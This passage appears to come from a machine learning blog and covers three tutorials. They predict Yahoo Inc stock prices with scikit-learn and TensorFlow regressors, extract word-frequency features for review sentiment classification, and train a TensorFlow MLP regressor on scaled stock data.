    #Predict the stock price during a specified time
    #
    #startDate: The start date as a string in yyyy-mm-dd format
    #endDate: The end date as a string in yyyy-mm-dd format
    #return: A dataframe containing the predictions or None
    def PredictDate(self, startDate, endDate):
        #Create the range of timestamps and reverse them
        ts = DateRange(startDate, endDate)[::-1]
        m = ts.shape[0]
        #Prediction is based on data prior to start date
        #Get timestamp of previous day
        prevts = DatePrevDay(ts[-1])
        #Test if there is enough data to continue
        try:
            ind = np.where(self.DTS == prevts)[0][0]
        except IndexError:
            return None
        #There is enough data to perform prediction; allocate new data frame
        P = pd.DataFrame(np.zeros([m, self.D.shape[1]]), index = range(m), columns = self.D.columns)
        #Add in the timestamp column so that it can be scaled properly
        P['Timestamp'] = ts
        #Scale the timestamp (other fields are 0)
        P[P.columns] = self.S.transform(P)
        #B is to be the data matrix of features
        B = np.zeros([1, self._GetNumFeatures()])
        #Add extra last entries for past existing data
        for i in range(self.npd):
            #If the current index does not exist, repeat the last valid data
            curInd = ind + i
            if(curInd >= self.D.shape[0]):
                curInd = curInd - 1
            #Copy over the past data (already scaled)
            P.loc[m + i] = self.D.loc[curInd]
        #Loop until end date is reached
        for i in range(m - 1, -1, -1):
            #Create one sample
            self._GetSample(B[0], i, P)
            #Predict the row of the dataframe and save it
            pred = self.R.predict(B).ravel()
            #Fill in the remaining fields into the respective columns
            for j, k in zip(self.targCols, pred):
                P.set_value(i, j, k)
        #Discard extra rows needed for prediction
        P = P[0:m]
        #Scale the dataframe back to the original range
        P[P.columns] = self.S.inverse_transform(P)
        return P

The basic idea of the above code is as follows: use the data from today and the past *nPastDays* days (*nPastDays* + 1 total) to predict the stock data for tomorrow. The *PredictDate* function can then repeat this process indefinitely into the future by basing subsequent predictions on predicted data. It is reasonable to expect that these subsequent predictions become increasingly unreliable.
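The recursive scheme can be sketched in isolation. The toy series, window size, and LinearRegression model below are illustrative stand-ins, not the *StockPredictor* internals: each prediction is appended to the history and fed back in as input for the next one.

```python
import numpy as np
from sklearn.linear_model import LinearRegression

#Toy series: a noiseless linear trend, so the recursion is easy to verify
series = np.arange(20, dtype=np.float64)
k = 3  #Number of past values per prediction (analogous to nPastDays)

#Training samples: each row is k consecutive values, the target is the next one
A = np.array([series[i:i + k] for i in range(len(series) - k)])
y = series[k:]
model = LinearRegression().fit(A, y)

#Recursive forecast: predictions rest on previously predicted data
history = list(series)
preds = []
for _ in range(5):
    x = np.array(history[-k:]).reshape(1, -1)
    nxt = model.predict(x)[0]
    preds.append(nxt)
    history.append(nxt)
print(preds)
```

On this noiseless trend the recursion stays exact; on real stock data each step compounds the previous step's error, which is why the far future is the least trustworthy.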

With the above class in place, the MLPR class and others are used to make stock predictions for Yahoo Inc. Data is loaded from the CSV file, a prediction is made for a user-specified range of dates, and the results are plotted. Sample main code is as follows:

```python
#Grab the data frame
D = ParseData('yahoostock.csv')
#The number of previous days of data used
#when making a prediction
numPastDays = 16
#Number of neurons in the input layer
i = numPastDays * 7 + 1
#Number of neurons in the output layer
o = D.shape[1] - 1
#Number of neurons in the hidden layers
h = int((i + o) / 2)
#The list of layer sizes
layers = [i, h, h, h, h, h, o]
R = MLPR(layers, maxItr = 1000, tol = 0.40, reg = 0.001, verbose = True)
sp = StockPredictor(R, nPastDays = numPastDays)
#Learn the dataset and then display performance statistics
sp.Learn(D)
sp.TestPerformance()
#Perform prediction for a specified date range
P = sp.PredictDate('2016-11-02', '2016-12-31')
#Keep track of number of predicted results for plot
n = P.shape[0]
#Append the predicted results to the actual results
D = P.append(D)
#Predicted results are the first n rows
PlotData(D, range(n + 1))
```

In addition to the MLPR class from a previous post, the *StockPredictor* class works with any class that provides the basic sklearn interface: *fit*, *predict*, and *score*. A Python program which provides a basic command line interface for the primary functionality of this class can be found here.

Next, the program is employed to predict the stock data for Yahoo Inc from November 2nd to December 31st, 2016. A KNeighborsRegressor instance from sklearn was provided to the *StockPredictor* constructor to produce the prediction shown in Figure 2.

**Figure 2: Yahoo Inc Stock Data with Prediction from KNN**
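Since *StockPredictor* relies only on the *fit*/*predict*/*score* interface, swapping in KNeighborsRegressor requires no other changes. As a sketch on toy data (a sine curve standing in for the scaled stock features, not the actual dataset), here is that interface in action:

```python
import numpy as np
from sklearn.neighbors import KNeighborsRegressor

#Toy regression data standing in for the scaled stock features
A = np.linspace(0, 1, 50).reshape(-1, 1)
y = np.sin(2 * np.pi * A).ravel()

knr = KNeighborsRegressor(n_neighbors=5)
knr.fit(A, y)         #The same interface StockPredictor calls
yHat = knr.predict(A) #One prediction per input sample
r2 = knr.score(A, y)  #R^2 score on the training data
print(yHat.shape, r2)
```

Any sklearn regressor exposing these three methods could be substituted the same way.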

Finally, the MLPR class from the previous post is used to perform prediction. The results can be seen below in Figure 3.

**Figure 3: Yahoo Inc Stock Data with Prediction from MLPR**

It appears the artificial neural network does not have much faith in Yahoo Inc.

The *StockPredictor* class above takes a slightly less naive approach to stock prediction than that from the previous post. In future posts, I hope to combine sentiment analysis techniques on textual data sets with stock data to make a more reasonable model. I hope to see you then.


In data science and machine learning, there is often difficulty in extracting useful features from raw data. Textual data presents an interesting challenge in this regard, especially given its abundance on the internet. Because of its complexity, natural language is often not directly suited to training a classifier or regressor model. The following section discusses several simple ways to extract useful features from raw text. The dataset containing the raw text that will be used can be found here.

The dataset consists of sentences gathered from IMDb, Amazon, and Yelp reviews. Each sentence is associated with a sentiment score: 0 if it is a negative sentence, and 1 if it is positive. For simplicity, the three files are first combined into a single file. This can be accomplished using a simple Linux command:

*cat imdb_labelled.txt amazon_cells_labelled.txt yelp_labelled.txt > comb.txt*.

A basic function to parse the data is shown in the following block:

```python
#Read sentiment labeled sentences from the specified path
#path: The path to the file containing sentiment labeled text data
#return: A tuple (S, y) where S is an array of sentences and y is an
#        array of target values
def LoadData(path):
    #File format is <text>\t<sentiment score>
    #Parse accordingly
    S = []
    y = []
    #Open file and loop over it line by line
    with open(path) as f:
        for l in f:
            text, sent = l.split('\t')
            #Strip any non-ascii characters
            text = StripNonAscii(text)
            #Parse sentiment score
            sent = float(sent)
            #Append results
            S.append(text)
            y.append(sent)
    return (S, y)
```

With the data parsed, the next step is to extract numeric features from it. A simple yet effective way of accomplishing this is to make a vector of word frequencies. The concept of a frequency vector is like that of a histogram or word cloud.

**Figure 1: Word Frequency Histogram**

In a frequency vector, each component corresponds to the number of times a given word occurs in the corpus. A histogram where each bin contains a single word in the vocabulary is a visual representation of this concept.
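The idea can be illustrated with the standard library alone, before bringing in Scikit-learn. The two-sentence corpus below is a made-up stand-in for the review data:

```python
from collections import Counter

#A tiny stand-in corpus
corpus = ["the phone is great", "the movie was not great"]
#Split each sentence on whitespace and tally word occurrences
freq = Counter(w for s in corpus for w in s.split())
print(freq["the"], freq["great"], freq["phone"])
```

Each distinct word gets one count, which corresponds to one bin of the histogram (and one component of the frequency vector).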

Another popular diagram that is related to these concepts is the word cloud. The word cloud plots words with their font size determined by the frequency of their occurrence. An example word cloud created from the above dataset is shown below in Figure 2.

**Figure 2: Word Cloud of the Dataset**

Computing a matrix of word frequencies can be easily accomplished with Scikit-learn using the *CountVectorizer* class. The constructor takes many arguments, but useful defaults are provided for all but one. Some interesting arguments to note are:

- **input:** A file, filename, or sequence of string-like objects.
- **ngram_range:** The range of *ngram*\* sizes to include.
- **stop_words:** Words that will be ignored (like "a").
- **max_df:** Any word occurring more frequently than this number is discarded.
- **min_df:** Any word occurring less frequently than this number is discarded.
- **max_features:** The maximum number of terms that will be maintained.
- **vocabulary:** Explicitly provide a list of words to count and ignore others.

**\*Note:** An *ngram* is a sequence of contiguous words like "the phone" or "favorite movie." The use of ngrams will be explored in a later blog post.
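As a quick illustration of the *ngram_range* argument on a made-up two-sentence corpus, setting it to (1, 2) counts both single words and two-word phrases:

```python
from sklearn.feature_extraction.text import CountVectorizer

#A tiny stand-in corpus
corpus = ["my favorite movie", "the phone is my favorite"]
#ngram_range=(1, 2) includes unigrams and bigrams
cv = CountVectorizer(ngram_range=(1, 2))
cv.fit(corpus)
#vocabulary_ maps each term (word or phrase) to its column index
vocab = sorted(cv.vocabulary_)
print(vocab)
```

Bigrams like "favorite movie" become features alongside the individual words, at the cost of a larger vocabulary.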

To extract the features with our code so far, the following three lines suffice:

```python
S, y = LoadData('/path/to/directory/comb.txt')
cv = CountVectorizer()
A = cv.fit_transform(S) #Example use of cv
```

The following code prints to the screen the top 32 words among all sentences along with the number of their occurrences:

```python
V = np.sum(cv.fit_transform(S).toarray(), axis = 0)
D = list(zip(V, cv.get_feature_names(), range(V.shape[0])))
for freq, word, c in sorted(D, key = lambda t : t[0], reverse = True)[0:32]:
    print('{:5d}'.format(c) + '{:5d}'.format(freq) + '\t' + word)
```

An inspection of Table 1 below reveals that the most commonly occurring features do not offer much useful information about the data. The goal is to assign a sentence a sentiment value, but the above words can be reasonably expected to occur in both positive and negative sentences. Their frequency is simply due to the semantics of the English language.

Number | Frequency | Word |
---|---|---|
1 | 1953 | the |
2 | 1138 | and |
3 | 789 | it |
4 | 754 | is |
5 | 670 | to |

**Table 1: Top 5 Words by Frequency**

There are several ways to get around this problem. The most direct approach is to compile a list of *stop words*, or words to ignore. Thankfully, Scikit-learn has already implemented this. Simply specify *stop_words='english'* in the CountVectorizer constructor. Table 2 below shows the updated results.

Number | Frequency | Word |
---|---|---|
1 | 230 | good |
2 | 210 | great |
3 | 182 | movie |
4 | 168 | phone |
5 | 163 | film |

**Table 2: Top 5 Words by Frequency with Stop Words**
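The effect of the stop-word filter can be seen on a tiny made-up corpus: common function words disappear from the vocabulary while content words remain.

```python
from sklearn.feature_extraction.text import CountVectorizer

#A tiny stand-in corpus
corpus = ["the movie was great", "the phone is good"]
#Scikit-learn's built-in English stop-word list drops "the", "was", "is", etc.
cv = CountVectorizer(stop_words='english')
cv.fit(corpus)
vocab = sorted(cv.vocabulary_)
print(vocab)
```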

The above list looks better, but there is still room for improvement; "movie", "phone", and "film" are most likely not the best words for determining the sentiment of a sentence. As seen above, Scikit-learn offers the ability to supply a custom vocabulary. Intuitively speaking, words with positive and negative connotations like "great", "horrible", and "love" ought to be of the highest importance as features.

To explore this further, consider the dimensionality-reducing transform provided by linear discriminant analysis (LDA). By modeling positive sentiment and negative sentiment as classes, a linear transform which maximizes the between-class variance relative to the within-class variance is constructed. With *c* classes, LDA reduces *n*-dimensional features to (*c* − 1)-dimensional features; since there are only two classes in this case, the transform reduces the *n*-dimensional features to 1-dimensional features and the transform matrix is thus of dimension 1 × *n*. The components of largest magnitude in this matrix will thus be the directions that most greatly influence the sentiment score. Code to view the top components is as follows:

```python
cv = CountVectorizer(stop_words = 'english', max_features = 256)
D = cv.fit_transform(S)
lda = LinearDiscriminantAnalysis()
lda.fit(D.toarray(), y)
m = 40
topmfeats = np.abs(lda.coef_[0]).argsort()[-m:][::-1]
for i, j in enumerate(topmfeats):
    s = '{:4d}'.format(i) + "\t"
    s += '{:16s}'.format(cv.get_feature_names()[j])
    s += '{:+5.3f}'.format(lda.coef_[0][j])
    print(s)
```

The results are shown below in Table 3.

Index | Word | Coefficient |
---|---|---|
0 | perfect | +3.458 |
1 | fantastic | +3.448 |
2 | delicious | +3.432 |
3 | awesome | +3.400 |
4 | beautiful | +3.287 |
5 | enjoyed | +3.165 |
6 | disappointing | -3.107 |
7 | liked | +3.063 |

**Table 3: Top Words by LDA Coefficient Magnitude**
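As an aside, the 1 × *n* shape of the two-class LDA transform can be verified on synthetic data, independent of the sentiment dataset. The data below is made up: two Gaussian classes separated along the first of four features.

```python
import numpy as np
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis

rng = np.random.RandomState(0)
n = 4  #Feature dimension
#Two synthetic classes separated along the first feature
X0 = rng.randn(50, n)
X1 = rng.randn(50, n)
X1[:, 0] += 3.0
X = np.vstack([X0, X1])
y = np.array([0] * 50 + [1] * 50)

lda = LinearDiscriminantAnalysis().fit(X, y)
#With two classes, coef_ is 1 x n: a single direction in feature space
print(lda.coef_.shape)
#The transform maps n-dimensional samples down to 1 dimension
print(lda.transform(X).shape)
#The largest-magnitude coefficient picks out the separating feature
print(np.abs(lda.coef_[0]).argmax())
```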

When considering the sources of the data (IMDb, Amazon, and Yelp), the above results confirm intuition. The sentiment rating is largely influenced by words with strongly negative or positive connotations. Further, words with positive connotations influence the result in a positive direction (towards 1) while words with negative connotations influence the result in a negative direction (towards 0).

Next, a classifier is trained and results are generated. First, the raw frequencies will be used with a stock logistic regression model. Sample code and results follow.

```python
#Prints testing accuracy results to the screen
#C: The classifier to use
#F: The feature extractor to use
#S: The list of sentences
#y: The target vectors
def RunCVTest(C, F, S, y):
    #Fix the random state for better comparison
    kf = KFold(len(S), shuffle = True, random_state = 32)
    for trn, tst in kf:
        #Make sure to only train with the training data;
        #in a realistic scenario only training data is available at the
        #feature extraction stage
        F.fit(S[trn])
        B = F.transform(S)
        #Fit the classifier C
        C.fit(B[trn], y[trn])
        #Results for cross-validation set
        r1 = C.score(B[tst], y[tst])
        #Results for training data
        r2 = C.score(B[trn], y[trn])
        #Both results combined
        r3 = C.score(B, y)
        s = 'Tst: ' + '{:.4f}'.format(r1)
        s += '\tTrn: ' + '{:.4f}'.format(r2)
        s += '\tAll: ' + '{:.4f}'.format(r3)
        print(s)

#...
#%% A first attempt
S, y = LoadData(DATA_PATH + 'comb.txt')
cv = CountVectorizer()
lr = LogisticRegression()
#Convert to numpy array for indexing ability
S = np.array(S)
y = np.array(y)
print('LogisticRegression: ')
RunCVTest(lr, cv, S, y)
```

At this point, the results are decent. However, as can be seen from Table 4 below, there is a large discrepancy between the testing and training accuracy scores; the model appears to be over-fitting the training data. This is not overly surprising when the results from Table 1 are considered. If the features contain superfluous information, the model is likely to at least partially fit the superfluous information, allowing for high accuracy on the training data but poor generalization ability.

Test | Train | All |
---|---|---|
79.30% | 98.20% | 91.90% |
79.90% | 97.85% | 91.87% |
82.10% | 97.95% | 92.67% |

**Table 4: Logistic Regression Performance Results**

To help reduce the dimensionality of the data, prevent over-fitting, and to slightly improve the results, a custom vocabulary is used. This vocabulary is constructed by using the LDA components of largest magnitude as discussed earlier.

```python
#%% A second attempt with custom vocabulary
S, y = LoadData(DATA_PATH + 'comb.txt')
cv = CountVectorizer(stop_words = 'english', max_features = 512)
D = cv.fit_transform(S)
lda = LinearDiscriminantAnalysis()
lda.fit(D.toarray(), y)
#Determined by exhaustively searching 1 <= m <= 512
m = 213
topmfeats = np.abs(lda.coef_[0]).argsort()[-m:][::-1]
voc = [cv.get_feature_names()[i] for i in topmfeats]
avgs = RunCVTest(LogisticRegression(), CountVectorizer(vocabulary = voc), S, y)
```

In the above code, only the first 213 words are preserved. Table 5 contains the updated results from the above code.

Test | Train | All |
---|---|---|
80.50% | 84.40% | 83.10% |
80.10% | 83.90% | 82.63% |
82.50% | 82.75% | 82.67% |

**Table 5: Logistic Regression with Custom Vocabulary Results**

As can be seen, there is a modest improvement in the cross-validation performance, while performance on the training data has decreased. This is reasonable, as some spurious features have been removed and so the potential for over-fitting has been reduced. Finally, some further slight performance improvements can be had by grid searching through the parameters of the feature extractor and classifier.

```python
#Determines locally optimal parameters for the LogisticRegression
#classifier using exhaustive search
#S: The list of sentences
#y: The target vectors of sentiment scores
#voc: The vocabulary to use for CountVectorizer
#ret: The locally optimal classifier
def FindBestParams(S, y, voc):
    #This will take a long time to run!
    params = {'penalty':('l1', 'l2'),
              'intercept_scaling':np.arange(0.1, 10.1, 0.1),
              'C':np.arange(0.1, 10.1, 0.1)}
    cv = CountVectorizer(vocabulary = voc)
    gscv = GridSearchCV(LogisticRegression(), params)
    gscv.fit(cv.fit_transform(S), y)
    return gscv

#...
gscv = FindBestParams(S, y, voc)
lr = gscv.best_estimator_
RunCVTest(lr, cv, S, y)
```

The final results are shown below in Table 6.

Test | Train | All |
---|---|---|
80.60% | 84.80% | 83.40% |
80.80% | 84.55% | 83.30% |
84.60% | 83.10% | 83.60% |

**Table 6: Tuned Results for Logistic Regression**

Further improvements in the performance of the model can probably be had by additional parameter tuning and by increasing the size of the dataset.

Vectors of word frequencies are a basic type of feature that can be extracted from textual data. Despite the simplicity of the feature, reasonable performance can be achieved. A future blog post will explore some slightly more sophisticated methods available in Scikit-learn and possibly other libraries. I hope to see you then.


The data used in this post was collected from finance.yahoo.com. The data consists of historical stock data from Yahoo Inc. over the period from the 12th of April 1996 to the 19th of April 2016. The data can be downloaded as a CSV file from the provided link. To pre-process the data for the neural network, first transform the dates into integer values using LibreOffice's DATEVALUE function. A screenshot of the transformed data can be seen as follows:

**Figure 1: Pre-Processing Data Using LibreOffice**

For simplicity's sake, the "High" value will be computed based on the "Date Value." Thus, the goal is to create an MLP that takes as input a date in the form of an integer and returns a predicted high value of the Yahoo Inc. stock price for that day.

With the date values saved in the spreadsheet, the data is next loaded into Python. To improve the performance of the MLP, the data is first scaled so that both the input and output data have mean 0 and variance 1. This can be accomplished as follows (take note that "Date Value" is in column index 1 and "High" is in column index 4):

```python
import numpy as np
from TFANN import MLPR
import matplotlib.pyplot as mpl
from sklearn.preprocessing import scale

pth = filePath + 'yahoostock.csv'
A = np.loadtxt(pth, delimiter=",", skiprows=1, usecols=(1, 4))
A = scale(A)
#y is the dependent variable
y = A[:, 1].reshape(-1, 1)
#A contains the independent variable
A = A[:, 0].reshape(-1, 1)
#Plot the high value of the stock price
mpl.plot(A[:, 0], y[:, 0])
mpl.show()
```

The produced plot is as follows:

**Figure 2: Scaled Yahoo Stock Data**
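One caveat with the `scale` function used above: it does not retain the fitted mean and standard deviation, so predictions stay in scaled units. A minimal sketch (on made-up stand-in data, not the stock CSV) of using sklearn's `StandardScaler` instead, which remembers the fit and supports `inverse_transform`:

```python
import numpy as np
from sklearn.preprocessing import StandardScaler

#Toy stand-in for the (date value, high price) columns
A = np.array([[1.0, 10.0], [2.0, 12.0], [3.0, 11.0], [4.0, 15.0]])

ss = StandardScaler()
As = ss.fit_transform(A)  #Each column now has mean 0 and variance 1
print(As.mean(axis=0), As.std(axis=0))
#Unlike the scale() function, the scaler object remembers the fitted
#mean/std, so scaled values can be mapped back to the original units
recovered = ss.inverse_transform(As)
print(np.allclose(recovered, A))
```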

Next, an MLP is constructed and trained on the scaled data.

The MLP class that will be used follows a simple interface similar to that of the Python scikit-learn library. The source code is available here. The interface is as follows:

```python
#Fit the MLP to the data
#param A: numpy matrix where each row is a sample
#param y: numpy matrix of target values
def fit(self, A, y):

#Predict the output given the input (only run after calling fit)
#param A: The input values for which to predict outputs
#return: The predicted output values (one row per input sample)
def predict(self, A):

#Predicts the outputs for input A and then computes the RMSE between
#the predicted values and the actual values
#param A: The input values for which to predict outputs
#param y: The actual target values
#return: The RMSE
def score(self, A, y):
```

The first step is to create an MLPR object. This can be done as follows:

```python
#Number of neurons in the input layer
i = 1
#Number of neurons in the output layer
o = 1
#Number of neurons in the hidden layers
h = 32
#The list of layer sizes
layers = [i, h, h, h, h, h, h, h, h, h, o]
mlpr = MLPR(layers, maxItr = 1000, tol = 0.40, reg = 0.001, verbose = True)
```

With this code, an MLPR object will be initialized with the given layer sizes, a training iteration limit of 1000, an error tolerance of 0.40 (for the RMSE), regularization weight of 0.001, and verbose output enabled. The source code for the MLPR class shows how this is accomplished.

```python
#Create the MLP variables for TF graph
#_X: The input matrix
#_W: The weight matrices
#_B: The bias vectors
#_AF: The activation function
def _CreateMLP(_X, _W, _B, _AF):
    n = len(_W)
    for i in range(n - 1):
        _X = _AF(tf.matmul(_X, _W[i]) + _B[i])
    return tf.matmul(_X, _W[n - 1]) + _B[n - 1]

#Add L2 regularizers for the weight and bias matrices
#_W: The weight matrices
#_B: The bias matrices
#return: tensorflow variable representing l2 regularization cost
def _CreateL2Reg(_W, _B):
    n = len(_W)
    regularizers = tf.nn.l2_loss(_W[0]) + tf.nn.l2_loss(_B[0])
    for i in range(1, n):
        regularizers += tf.nn.l2_loss(_W[i]) + tf.nn.l2_loss(_B[i])
    return regularizers

#Create weight and bias vectors for an MLP
#layers: The number of neurons in each layer (including input and output)
#return: A tuple of lists of the weight and bias matrices respectively
def _CreateVars(layers):
    weight = []
    bias = []
    n = len(layers)
    for i in range(n - 1):
        #Fan-in for layer; used as standard dev
        lyrstd = np.sqrt(1.0 / layers[i])
        curW = tf.Variable(tf.random_normal([layers[i], layers[i + 1]], stddev = lyrstd))
        weight.append(curW)
        curB = tf.Variable(tf.random_normal([layers[i + 1]], stddev = lyrstd))
        bias.append(curB)
    return (weight, bias)

...

#The constructor
#param layers: A list of layer sizes
#param actvFn: The activation function to use: 'tanh', 'sig', or 'relu'
#param learnRate: The learning rate parameter
#param decay: The decay parameter
#param maxItr: Maximum number of training iterations
#param tol: Maximum error tolerated
#param batchSize: Size of training batches to use (use all if None)
#param verbose: Print training information
#param reg: Regularization weight
def __init__(self, layers, actvFn = 'tanh', learnRate = 0.001, decay = 0.9,
             maxItr = 2000, tol = 1e-2, batchSize = None, verbose = False, reg = 0.001):
    #Parameters
    self.tol = tol
    self.mItr = maxItr
    self.vrbse = verbose
    self.batSz = batchSize
    #Input size
    self.x = tf.placeholder("float", [None, layers[0]])
    #Output size
    self.y = tf.placeholder("float", [None, layers[-1]])
    #Setup the weight and bias variables
    weight, bias = _CreateVars(layers)
    #Create the tensorflow MLP model
    self.pred = _CreateMLP(self.x, weight, bias, _GetActvFn(actvFn))
    #Use L2 as the cost function
    self.loss = tf.reduce_sum(tf.nn.l2_loss(self.pred - self.y))
    #Use regularization to prevent over-fitting
    if(reg is not None):
        self.loss += _CreateL2Reg(weight, bias) * reg
    #Use ADAM method to minimize the loss function
    self.optmzr = tf.train.AdamOptimizer(learning_rate = learnRate).minimize(self.loss)
```

As seen above, tensorflow placeholder variables are created for the input (x) and the output (y). Next, tensorflow variables for the weight matrices and bias vectors are created using the _CreateVars() function. The weights are initialized as random normal numbers distributed as N(0, 1/n), where n is the fan-in to the layer.
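The initialization scheme can be checked with plain numpy, independent of tensorflow. Drawing weights with standard deviation sqrt(1/n) (matching the `lyrstd` computation in `_CreateVars`) gives a sample standard deviation close to that value:

```python
import numpy as np

rng = np.random.RandomState(0)
fan_in = 32
#Weights drawn from N(0, 1/fan_in): the standard deviation is sqrt(1/fan_in)
W = rng.normal(0.0, np.sqrt(1.0 / fan_in), size=(fan_in, 64))
print(W.std(), np.sqrt(1.0 / fan_in))
```

Scaling the variance by the fan-in keeps the pre-activation magnitudes roughly constant from layer to layer, which helps early training.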

Next, the MLP model is constructed using its definition as discussed in an earlier post. After that, the loss and regularization functions are defined as the L2 loss. Regularization penalizes larger values in the weight matrices and bias vectors to help prevent over-fitting. Lastly, tensorflow’s AdamOptimizer is employed as the training optimizer with the goal of minimizing the loss function. Note that at this stage the learning has not yet been done, only the tensorflow graph has been initialized with the necessary components of the MLP.

Next, the MLP is trained with the Yahoo stock data. A hold-out period is used to assess how well the MLP is performing. This can be accomplished as follows:

```python
#Length of the hold-out period
nDays = 5
n = len(A)
#Learn the data
mlpr.fit(A[0:(n - nDays)], y[0:(n - nDays)])
```

When the fit function is called, the actual training process begins. First, a tensorflow session must be created and all variables defined in the constructor must be initialized. Then, training iterations are performed up to the iteration limit provided, the weights are updated, and the error is recorded. The feed_dict parameter specifies the values of our inputs (x) and outputs (y). If the error falls below the tolerance level, training is completed, otherwise the maximum number of iterations is exhausted.

```python
#Fit the MLP to the data
#param A: numpy matrix where each row is a sample
#param y: numpy matrix of target values
def fit(self, A, y):
    m = len(A)
    #Start the tensorflow session and initialize
    #all variables
    self.sess = tf.Session()
    init = tf.initialize_all_variables()
    self.sess.run(init)
    #Begin training
    for i in range(self.mItr):
        #Batch mode or all at once
        if(self.batSz is None):
            self.sess.run(self.optmzr, feed_dict={self.x:A, self.y:y})
        else:
            for j in range(0, m, self.batSz):
                batA, batY = _NextBatch(A, y, j, self.batSz)
                self.sess.run(self.optmzr, feed_dict={self.x:batA, self.y:batY})
        err = np.sqrt(self.sess.run(self.loss, feed_dict={self.x:A, self.y:y}) * 2.0 / m)
        if(self.vrbse):
            print("Iter " + str(i + 1) + ": " + str(err))
        if(err < self.tol):
            break
```
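The stop-at-tolerance pattern in the loop above can be seen in miniature with plain numpy. The sketch below (toy least-squares data and a hand-rolled gradient step, not the MLPR internals) iterates until the RMSE falls below the tolerance or the iteration limit is exhausted:

```python
import numpy as np

rng = np.random.RandomState(0)
A = rng.randn(100, 3)
y = A @ np.array([1.0, -2.0, 0.5])  #Known linear relationship

w = np.zeros(3)
tol, maxItr, lr = 0.05, 1000, 0.05
for i in range(maxItr):
    #RMSE on all data, as in the MLPR fit loop
    err = np.sqrt(np.mean((A @ w - y) ** 2))
    if err < tol:
        break  #Early stop once the error tolerance is reached
    #One gradient step on the squared-error loss
    grad = A.T @ (A @ w - y) / len(A)
    w -= lr * grad
print(i, err)
```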

With the MLP network trained, prediction can be performed and the results plotted using matplotlib.

```python
#Begin prediction
yHat = mlpr.predict(A)
#Plot the results
mpl.plot(A, y, c='#b0403f')
mpl.plot(A, yHat, c='#5aa9ab')
mpl.show()
```

**Figure 3: Actual vs Predicted Stock Data**

As can be seen, the MLP smooths the original stock data. The amount of smoothing depends on the MLP parameters, including the number of layers, the sizes of the layers, the error tolerance, and the amount of regularization. In practice, a good deal of parameter tuning is required to get decent results from a neural network.
